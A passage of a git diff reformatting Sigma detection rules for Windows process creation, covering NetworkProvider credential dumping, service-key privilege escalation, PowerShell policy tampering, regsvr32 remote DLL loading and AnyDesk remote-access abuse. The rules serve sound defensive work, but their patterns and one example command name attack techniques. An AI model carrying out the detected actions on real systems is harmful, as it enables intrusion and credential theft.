UserInitMprLogonScript + CommandLine|contains: UserInitMprLogonScript condition: process_creation and selection falsepositives: - - Legitimate addition of Logon Scripts via the command line by administrators - or third party tools + - Legitimate addition of Logon Scripts via the command line by administrators or third party tools level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_registry_new_network_provider.yml b/sigma/sysmon/process_creation/proc_creation_win_registry_new_network_provider.yml index be7c45cbd..be0d45566 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_registry_new_network_provider.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_registry_new_network_provider.yml @@ -1,11 +1,10 @@ title: Potential Credential Dumping Attempt Using New NetworkProvider - CLI id: baef1ec6-2ca9-47a3-97cc-4cf2bda10b77 related: - - id: 0442defa-b4a2-41c9-ae2c-ea7042fc4701 - type: similar + - id: 0442defa-b4a2-41c9-ae2c-ea7042fc4701 + type: similar status: test -description: Detects when an attacker tries to add a new network provider in order - to dump clear text credentials, similar to how the NPPSpy tool does it +description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it references: - https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy @@ -24,9 +23,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - \System\CurrentControlSet\Services\ - \NetworkProvider + # filter: + # CommandLine|contains: + # - '\System\CurrentControlSet\Services\WebClient\NetworkProvider' + # - '\System\CurrentControlSet\Services\LanmanWorkstation\NetworkProvider' + # - '\System\CurrentControlSet\Services\RDPNP\NetworkProvider' + # - '\System\CurrentControlSet\Services\P9NP\NetworkProvider' # Related to WSL remove the comment if you use WSL in your ENV condition: process_creation and selection falsepositives: - Other legitimate network providers used and not filtred in this rule diff --git a/sigma/sysmon/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml b/sigma/sysmon/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml index 6e445044f..aa8884f32 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml @@ -1,8 +1,7 @@ title: Potential Privilege Escalation via Service Permissions Weakness id: 0f9c21f1-6a73-4b0e-9809-cb562cb8d981 status: test -description: Detect modification of services configuration (ImagePath, FailureCommand - and ServiceDLL) in registry by processes with Medium integrity level +description: Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://pentestlab.blog/2017/03/31/insecure-registry-permissions/ @@ -22,10 +21,10 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: IntegrityLevel: Medium - CommandLine|contains|all: + CommandLine|contains|all: - ControlSet - services - CommandLine|contains: + CommandLine|contains: - \ImagePath - \FailureCommand - \ServiceDll diff --git a/sigma/sysmon/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml b/sigma/sysmon/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml index 5ef84ef2e..e5863f764 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml @@ -1,15 +1,14 @@ title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 related: - - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c - type: similar - - id: f9999590-1f94-4a34-a91e-951e47bedefd - type: similar - - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 - type: similar + - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c # CLI Generic + type: similar + - id: f9999590-1f94-4a34-a91e-951e47bedefd # CLI Abuse + type: similar + - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 # Registry + type: similar status: experimental -description: Detects potential abuse of the provisioning registry key for indirect - command execution through "Provlaunch.exe". +description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe". references: - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/ - https://twitter.com/0gtweet/status/1674399582162153472 @@ -27,7 +26,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: SOFTWARE\Microsoft\Provisioning\Commands\ + CommandLine|contains: SOFTWARE\Microsoft\Provisioning\Commands\ condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml b/sigma/sysmon/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml index 6e216dd55..e60727b09 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml @@ -1,15 +1,14 @@ title: Potential PowerShell Execution Policy Tampering - ProcCreation id: cf2e938e-9a3e-4fe8-a347-411642b28a9f related: - - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 - type: similar - - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 - type: similar - - id: 61d0475c-173f-4844-86f7-f3eebae1c66b - type: similar + - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 # ProcCreation Registry + type: similar + - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 # ProcCreation Cmdlet + type: similar + - id: 61d0475c-173f-4844-86f7-f3eebae1c66b # PowerShell ScriptBlock + type: similar status: test -description: Detects changes to the PowerShell execution policy registry key in order - to bypass signing requirements for script execution from the CommandLine +description: Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine references: - https://learn.microsoft.com/de-de/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3 author: Nasreddine Bencherchali (Nextron Systems) @@ -25,11 +24,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_path: - CommandLine|contains: + CommandLine|contains: - \ShellIds\Microsoft.PowerShell\ExecutionPolicy - \Policies\Microsoft\Windows\PowerShell\ExecutionPolicy selection_values: - CommandLine|contains: + CommandLine|contains: - Bypass - RemoteSigned - Unrestricted diff --git a/sigma/sysmon/process_creation/proc_creation_win_registry_typed_paths_persistence.yml b/sigma/sysmon/process_creation/proc_creation_win_registry_typed_paths_persistence.yml index b42464774..530086e8a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_registry_typed_paths_persistence.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_registry_typed_paths_persistence.yml @@ -1,8 +1,7 @@ title: Persistence Via TypedPaths - CommandLine id: ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba status: test -description: Detects modification addition to the 'TypedPaths' key in the user or - admin registry via the commandline. Which might indicate persistence attempt +description: Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt references: - https://twitter.com/dez_/status/1560101453150257154 - https://forensafe.com/blogs/typedpaths.html @@ -19,7 +18,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: \Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths + CommandLine|contains: \Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml index d6a53761c..1071177e6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml @@ -1,8 +1,7 @@ title: Potential Regsvr32 Commandline Flag Anomaly id: b236190c-1c61-41e9-84b3-3fe03f6d76b0 status: test -description: Detects a potential command line flag anomaly related to "regsvr32" in - which the "/i" flag is used without the "/n" which should be uncommon. +description: Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon. references: - https://twitter.com/sbousseaden/status/1282441816986484737?s=12 author: Florian Roth (Nextron Systems) @@ -21,11 +20,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \regsvr32.exe - CommandLine|contains: + CommandLine|contains: - ' /i:' - ' -i:' filter_main_flag: - CommandLine|contains: + CommandLine|contains: - ' /n ' - ' -n ' condition: process_creation and (selection and not 1 of filter_main_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml index bdd0fadd5..a8f5ba1be 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml @@ -1,8 +1,7 @@ title: Potentially Suspicious Regsvr32 HTTP IP Pattern id: 2dd2c217-bf68-437a-b57c-fe9fd01d5de8 status: experimental -description: Detects regsvr32 execution to download and install DLLs located remotely - where the address is an IP address. +description: Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address. references: - https://twitter.com/mrd0x/status/1461041276514623491 - https://twitter.com/tccontre18/status/1480950986650832903 @@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \regsvr32.exe - - OriginalFileName: REGSVR32.EXE + - Image|endswith: \regsvr32.exe + - OriginalFileName: REGSVR32.EXE selection_ip: - CommandLine|contains: + CommandLine|contains: - ' /i:http://1' - ' /i:http://2' - ' /i:http://3' diff --git a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_network_pattern.yml b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_network_pattern.yml index 89bc26c70..e13c9a312 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_network_pattern.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_network_pattern.yml @@ -1,11 +1,10 @@ title: Potentially Suspicious Regsvr32 HTTP/FTP Pattern id: 867356ee-9352-41c9-a8f2-1be690d78216 related: - - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d - type: obsoletes + - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d + type: obsoletes status: experimental -description: Detects regsvr32 execution to download/install/register new DLLs that - are hosted on Web or FTP servers. +description: Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers. references: - https://twitter.com/mrd0x/status/1461041276514623491 - https://twitter.com/tccontre18/status/1480950986650832903 @@ -25,14 +24,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \regsvr32.exe - - OriginalFileName: REGSVR32.EXE + - Image|endswith: \regsvr32.exe + - OriginalFileName: REGSVR32.EXE selection_flag: - CommandLine|contains: + CommandLine|contains: - ' /i' - ' -i' selection_protocol: - CommandLine|contains: + CommandLine|contains: - ftp - http condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_remote_share.yml b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_remote_share.yml index 221bef63f..35da70979 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_remote_share.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_remote_share.yml @@ -18,12 +18,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \regsvr32.exe - - OriginalFileName: \REGSVR32.EXE + - Image|endswith: \regsvr32.exe + - OriginalFileName: \REGSVR32.EXE selection_cli: - CommandLine|contains: ' \\\\' + CommandLine|contains: ' \\\\' condition: process_creation and (all of selection_*) falsepositives: - Unknown +# Decrease to medium if this is something common in your org level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_child_process.yml index 9c63bf757..0f13620bc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_child_process.yml @@ -1,8 +1,8 @@ title: Potentially Suspicious Child Process Of Regsvr32 id: 6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca related: - - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d - type: obsoletes + - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d + type: obsoletes status: experimental description: Detects potentially suspicious child processes of "regsvr32.exe". references: @@ -42,7 +42,7 @@ detection: - \wscript.exe filter_main_werfault: Image|endswith: \werfault.exe - CommandLine|contains: ' -u -p ' + CommandLine|contains: ' -u -p ' condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unlikely, but can rarely occur. Apply additional filters accordingly. diff --git a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml index c66110e9b..5c802dc22 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml @@ -1,11 +1,10 @@ title: Regsvr32 Execution From Potential Suspicious Location id: 9525dc73-0327-438c-8c04-13c0e037e9da related: - - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d - type: obsoletes + - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d + type: obsoletes status: experimental -description: Detects execution of regsvr32 where the DLL is located in a potentially - suspicious location. +description: Detects execution of regsvr32 where the DLL is located in a potentially suspicious location. references: - https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ @@ -23,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \regsvr32.exe - - OriginalFileName: REGSVR32.EXE + - Image|endswith: \regsvr32.exe + - OriginalFileName: REGSVR32.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - :\ProgramData\ - :\Temp\ - :\Users\Public\ @@ -35,7 +34,6 @@ detection: - \AppData\Roaming\ condition: process_creation and (all of selection_*) falsepositives: - - Some installers might execute "regsvr32" with DLLs located in %TEMP% or in %PROGRAMDATA%. - Apply additional filters if necessary. + - Some installers might execute "regsvr32" with DLLs located in %TEMP% or in %PROGRAMDATA%. Apply additional filters if necessary. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml index 6ad50d942..558710285 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml @@ -1,8 +1,7 @@ title: Regsvr32 Execution From Highly Suspicious Location id: 327ff235-94eb-4f06-b9de-aaee571324be status: experimental -description: Detects execution of regsvr32 where the DLL is located in a highly suspicious - locations +description: Detects execution of regsvr32 where the DLL is located in a highly suspicious locations references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -19,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \regsvr32.exe - - OriginalFileName: REGSVR32.EXE + - Image|endswith: \regsvr32.exe + - OriginalFileName: REGSVR32.EXE selection_path_1: - CommandLine|contains: + CommandLine|contains: - :\PerfLogs\ - :\Temp\ - \Windows\Registration\CRMLog @@ -41,26 +40,28 @@ detection: - \Windows\Tasks\ - \Windows\Tracing\ selection_path_2: - CommandLine|contains: + CommandLine|contains: + # This is to avoid collisions with CLI starting with "C:\" - ' "C:\' - ' C:\' - - ' ''C:\' + - " 'C:\\" - D:\ selection_exclude_known_dirs: - CommandLine|contains: + CommandLine|contains: + # Note: add additional locations that are related to third party applications - C:\Program Files (x86)\ - C:\Program Files\ - C:\ProgramData\ - C:\Users\ + # Note: The space added here are to avoid collisions with the "regsvr32" binary full path - ' C:\Windows\' - ' "C:\Windows\' - - ' ''C:\Windows\' + - " 'C:\\Windows\\" filter_main_empty: - CommandLine: '' + CommandLine: '' filter_main_null: - CommandLine: null - condition: process_creation and (selection_img and (selection_path_1 or (selection_path_2 - and not selection_exclude_known_dirs)) and not 1 of filter_main_*) + CommandLine: + condition: process_creation and (selection_img and (selection_path_1 or (selection_path_2 and not selection_exclude_known_dirs)) and not 1 of filter_main_*) falsepositives: - Unlikely level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_extensions.yml b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_extensions.yml index abdb6ec6b..4c18d5339 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_extensions.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_extensions.yml @@ -1,11 +1,10 @@ title: Regsvr32 DLL Execution With Suspicious File Extension id: 089fc3d2-71e8-4763-a8a5-c97fbb0a403e related: - - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d - type: obsoletes + - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d + type: obsoletes status: experimental -description: Detects the execution of REGSVR32.exe with DLL files masquerading as - other files +description: Detects the execution of REGSVR32.exe with DLL files masquerading as other files references: - https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/ - https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html @@ -25,10 +24,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \regsvr32.exe - - OriginalFileName: REGSVR32.EXE + - Image|endswith: \regsvr32.exe + - OriginalFileName: REGSVR32.EXE selection_cli: - CommandLine|endswith: + CommandLine|endswith: + # Add more image extensions + # https://twitter.com/Max_Mal_/status/1542461200797163522/photo/3 - .bin - .bmp - .cr2 diff --git a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_parent.yml b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_parent.yml index a584e7e75..dcbd8c1bb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_parent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_susp_parent.yml @@ -1,11 +1,10 @@ title: Scripting/CommandLine Process Spawned Regsvr32 id: ab37a6ec-6068-432b-a64e-2c7bf95b1d22 related: - - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d - type: obsoletes + - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d + type: obsoletes status: experimental -description: Detects various command line and scripting engines/processes such as - "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance. +description: Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance. references: - https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ @@ -34,11 +33,10 @@ detection: Image|endswith: \regsvr32.exe filter_main_rpcproxy: ParentImage: C:\Windows\System32\cmd.exe - CommandLine|endswith: ' /s C:\Windows\System32\RpcProxy\RpcProxy.dll' + CommandLine|endswith: ' /s C:\Windows\System32\RpcProxy\RpcProxy.dll' condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - - Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts leverage legitimately often. - Apply additional filter and exclusions as necessary + - Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts leverage legitimately often. Apply additional filter and exclusions as necessary - Some legitimate Windows services -level: medium +level: medium # Can be reduced to low if you experience a ton of FP ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml index 8643a06be..610595b27 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml @@ -1,8 +1,7 @@ title: Regsvr32 DLL Execution With Uncommon Extension id: 50919691-7302-437f-8e10-1fe088afa145 status: test -description: Detects a "regsvr32" execution where the DLL doesn't contain a common - file extension. +description: Detects a "regsvr32" execution where the DLL doesn't contain a common file extension. references: - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ author: Florian Roth (Nextron Systems) @@ -21,26 +20,25 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \regsvr32.exe - - OriginalFileName: REGSVR32.EXE + - Image|endswith: \regsvr32.exe + - OriginalFileName: REGSVR32.EXE filter_main_legit_ext: - CommandLine|contains: + CommandLine|contains: + # Note: For better accuracy you might not want to use contains - .ax - .cpl - - .dll + - .dll # Covers ".dll.mui" - .ocx filter_optional_pascal: - CommandLine|contains: .ppl + CommandLine|contains: .ppl filter_optional_avg: - CommandLine|contains: .bav + CommandLine|contains: .bav filter_main_null_4688: - CommandLine: null + CommandLine: filter_main_empty_4688: - CommandLine: '' - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + CommandLine: '' + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Other legitimate extensions currently not in the list either from third party - or specific Windows components. + - Other legitimate extensions currently not in the list either from third party or specific Windows components. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_software_ultraviewer.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_software_ultraviewer.yml index 1a11eb6d6..e380d629b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_software_ultraviewer.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_software_ultraviewer.yml @@ -1,18 +1,10 @@ title: Use of UltraViewer Remote Access Software id: 88656cec-6c3b-487c-82c0-f73ebb805503 status: test -description: 'An adversary may use legitimate desktop support and remote access software, - such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive - command and control channel to target systems within networks. - - These services are commonly used as legitimate technical support software, and - may be allowed by application control within a target environment. - - Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared - with other legitimate software commonly used by adversaries. (Citation: Symantec - Living off the Land) - - ' +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md author: frack113 @@ -29,9 +21,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Product: UltraViewer - - Company: DucFabulous Co,ltd - - OriginalFileName: UltraViewer_Desktop.exe + - Product: UltraViewer + - Company: DucFabulous Co,ltd + - OriginalFileName: UltraViewer_Desktop.exe condition: process_creation and selection falsepositives: - Legitimate use diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk.yml index e35f8f5a4..00befd485 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk.yml @@ -2,20 +2,12 @@ title: Remote Access Tool - AnyDesk Execution id: b52e84a3-029e-4529-b09b-71d19dd27e94 status: test related: - - id: 065b00ca-5d5c-4557-ac95-64a6d0b64d86 - type: similar -description: 'An adversary may use legitimate desktop support and remote access software, - such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive - command and control channel to target systems within networks. - - These services are commonly used as legitimate technical support software, and - may be allowed by application control within a target environment. - - Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared - with other legitimate software commonly used by adversaries. (Citation: Symantec - Living off the Land) - - ' + - id: 065b00ca-5d5c-4557-ac95-64a6d0b64d86 + type: similar +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows author: frack113 @@ -33,10 +25,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \AnyDesk.exe - - Description: AnyDesk - - Product: AnyDesk - - Company: AnyDesk Software GmbH + - Image|endswith: \AnyDesk.exe + - Description: AnyDesk + - Product: AnyDesk + - Company: AnyDesk Software GmbH condition: process_creation and selection falsepositives: - Legitimate use diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml index a27b9297b..790ef9097 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml @@ -1,8 +1,7 @@ title: Remote Access Tool - AnyDesk Piped Password Via CLI id: b1377339-fda6-477a-b455-ac0923f9ec2c status: test -description: Detects piping the password to an anydesk instance via CMD and the '--set-password' - flag. +description: Detects piping the password to an anydesk instance via CMD and the '--set-password' flag. references: - https://redcanary.com/blog/misbehaving-rats/ author: Nasreddine Bencherchali (Nextron Systems) @@ -20,7 +19,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: + # Example: C:\WINDOWS\system32\cmd.exe /C cmd.exe /c echo J9kzQ2Y0qO |C:\ProgramData\anydesk.exe --set-password - '/c ' - 'echo ' - .exe --set-password diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml index 60bef3a83..5571f8091 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml @@ -1,12 +1,11 @@ title: Remote Access Tool - AnyDesk Silent Installation id: 114e7f1c-f137-48c8-8f54-3088c24ce4b9 status: test -description: Detects AnyDesk Remote Desktop silent installation. Which can be used - by attackers to gain remote access. +description: Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access. references: - https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20 - https://support.anydesk.com/Automatic_Deployment -author: "J\xE1n Tren\u010Dansk\xFD" +author: Ján Trenčanský date: 2021/08/06 modified: 2023/03/05 tags: @@ -21,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - --install - --start-with-win - --silent diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml index bcdc49b3c..4e1578aaa 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml @@ -1,21 +1,13 @@ title: Remote Access Tool - Anydesk Execution From Suspicious Folder id: 065b00ca-5d5c-4557-ac95-64a6d0b64d86 related: - - id: b52e84a3-029e-4529-b09b-71d19dd27e94 - type: similar + - id: b52e84a3-029e-4529-b09b-71d19dd27e94 + type: similar status: test -description: 'An adversary may use legitimate desktop support and remote access software, - such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive - command and control channel to target systems within networks. - - These services are commonly used as legitimate technical support software, and - may be allowed by application control within a target environment. - - Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared - with other legitimate software commonly used by adversaries. (Citation: Symantec - Living off the Land) - - ' +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows author: Florian Roth (Nextron Systems) @@ -33,10 +25,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \AnyDesk.exe - - Description: AnyDesk - - Product: AnyDesk - - Company: AnyDesk Software GmbH + - Image|endswith: \AnyDesk.exe + - Description: AnyDesk + - Product: AnyDesk + - Company: AnyDesk Software GmbH filter: Image|contains: - \AppData\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_gotoopener.yml 